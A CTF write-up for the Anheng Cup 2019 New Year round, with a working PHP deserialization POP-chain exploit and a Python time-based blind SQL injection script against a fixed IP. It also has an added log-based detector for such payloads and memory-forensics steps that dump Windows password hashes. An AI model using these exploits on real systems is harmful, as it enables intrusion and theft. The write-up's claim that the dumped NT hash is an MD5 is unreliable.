Anheng Cup Monthly CTF 2019 New Year Round WriteUp

Web

WEB1

Challenge code

<?php
@error_reporting(1);
include 'flag.php';

class baby
{
    protected $skyobj;
    public $aaa;
    public $bbb;

    function __construct()
    {
        $this->skyobj = new sec;
    }

    // Invoked when the object is echoed; returns whatever $skyobj->read() returns
    function __toString()
    {
        if (isset($this->skyobj))
            return $this->skyobj->read();
    }
}

class cool
{
    public $filename;
    public $nice;
    public $amzing;

    function read()
    {
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;   // $sth is never defined, so aaa becomes null
        if ($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";
            if (file_get_contents($file))
            {
                return file_get_contents($file);
            }
            else
            {
                return "you must be joking!";
            }
        }
    }
}

class sec
{
    function read()
    {
        return "it's so sec~~";
    }
}

if (isset($_GET['data']))
{
    $Input_data = unserialize($_GET['data']);
    echo $Input_data;
}
else
{
    highlight_file("./index.php");
}
?>

Key points

Point 1: echo triggers __toString(), which can be used to return the contents of flag.php.

Point 2: make $this->nice an instance of a class other than baby, which bypasses the $sth comparison.

Point 3: unserialize() does not run __construct(), and the protected property skyobj cannot be set from outside, but when building the serialized payload it can be set inside the constructor.

EXP

<?php
// Only the class names and property layout matter for the serialized string;
// the method bodies are irrelevant because the target's own definitions run.
class baby
{
    protected $skyobj;

    function __construct()
    {
        // The protected property cannot be set from outside, so set it here:
        // the target never runs this constructor during unserialize()
        $this->skyobj = new cool;
        $this->skyobj->amzing = serialize(new sec);   // any non-baby class works
        $this->skyobj->filename = "flag.php";
    }
}

class sec
{
    function read() {}
}

class cool
{
    public $filename;
    public $nice;
    public $amzing;
}

$test = new baby();
// urlencode() is needed because the protected property name is serialized with NUL bytes
echo urlencode(serialize($test));

WEB2

Use a constraint attack to log in as admin.

After logging in, time-based blind injection.

EXP

#!/usr/bin/env python3
# encoding: utf-8

import requests
import time

DELAY_THRESHOLD = 2.5  # seconds; the sleep(3) in the payload is the signal


def login(payload):
    # Inject into the search[table] parameter; /**/ stands in for spaces
    url = "http://106.12.21.77/Admin/User/Index?search[table]=flag/**/where/**/1/**/and/**/%s" % (payload)
    # print("[+] %s" % (url))
    before_time = time.time()
    cookies = {'PHPSESSID': '3kus5jrhoqav8te0kf74hglii7'}
    response = requests.get(url, cookies=cookies)
    # content = response.content
    after_time = time.time()
    offset = after_time - before_time
    # print("[*] Offset : %f" % (offset))
    return offset > DELAY_THRESHOLD


def main():
    data = ""
    characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    for i in range(1, 40):
        for j in characters:
            # Time-based probe: the response is delayed by 3s when the i-th character matches
            payload = "if((mid((select/**/flag/**/from/**/flag),%d,1))='%s',sleep(3),0)%%23" % (i, j)
            if login(payload):
                data += j
                print("[+] Found : %s" % (data))
                break


if __name__ == "__main__":
    main()
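
Added example, not from the write-up: the time-based blind payload above leaves a recognisable trace in the web server's access log. This Python detector runs over constructed sample log lines (placeholder client IP from the documentation range), URL-decodes each query string, collapses the /**/ comment-as-whitespace trick, and flags requests that carry sleep()/benchmark() or at least two of: a character-extraction function, a sub-select, a comment terminator.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the write-up). Line 1 mirrors the
# shape of the blind-injection payload used above; lines 2 and 3 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2019:10:00:01 +0800] "GET /Admin/User/Index?search[table]=flag/**/where/**/1/**/and/**/if((mid((select/**/flag/**/from/**/flag),1,1))='f',sleep(3),0)%23 HTTP/1.1" 200 512
203.0.113.5 - - [01/Jan/2019:10:00:02 +0800] "GET /Admin/User/Index?search[table]=user HTTP/1.1" 200 2048
203.0.113.5 - - [01/Jan/2019:10:00:03 +0800] "GET /static/app.js HTTP/1.1" 200 9000
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# (indicator name, regex applied to the normalised query string)
RULES = [
    ("time_delay", re.compile(r"\b(sleep|benchmark)\s*\(")),
    ("char_probe", re.compile(r"\b(mid|substr|substring)\s*\(")),
    ("subselect", re.compile(r"\bselect\b.+\bfrom\b")),
    ("comment_tail", re.compile(r"(#|--\s)")),
]


def normalise(target):
    """Decode the query string and turn /**/ comments back into spaces."""
    query = target.split("?", 1)[1] if "?" in target else ""
    decoded = unquote_plus(query)            # %23 -> '#', + -> ' ', etc.
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    return re.sub(r"\s+", " ", decoded).lower()


def detect(log_text):
    """Return one finding per request that looks like time-based blind SQLi."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        q = normalise(m.group("target"))
        matched = [name for name, rx in RULES if rx.search(q)]
        # a delay function alone is decisive; otherwise require two independent indicators
        if "time_delay" in matched or len(matched) >= 2:
            hits.append({"ip": m.group("ip"), "indicators": matched, "query": q})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit["ip"], hit["indicators"], hit["query"])
```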

MISC

Steganography

binwalk -e zhu.jpg

Stegsolve

MISC2

Memory forensics

Just run it through volatility:

volatility imageinfo -f memory #identify the operating system
volatility hashdump -f memory --profile=WinXPSP2x86 #dump the password hashes of the running OS

The administrator's hash obtained is:

Administrator:500:0182bd0bd4444bf867cd839bf040d93b:c22b315c040ae6e0efee3518d830362b:::

So c22b315c040ae6e0efee3518d830362b is the MD5 of the administrator's password; it cracks to 123456789, and MD5-ing that once more gives the flag.

Related links

Volatility memory forensics tool usage: https://www.restran.net/2017/08/10/memory-forensics-tool-volatility/

CRYPTO

Keyboard cipher

ypau -> flag

not found!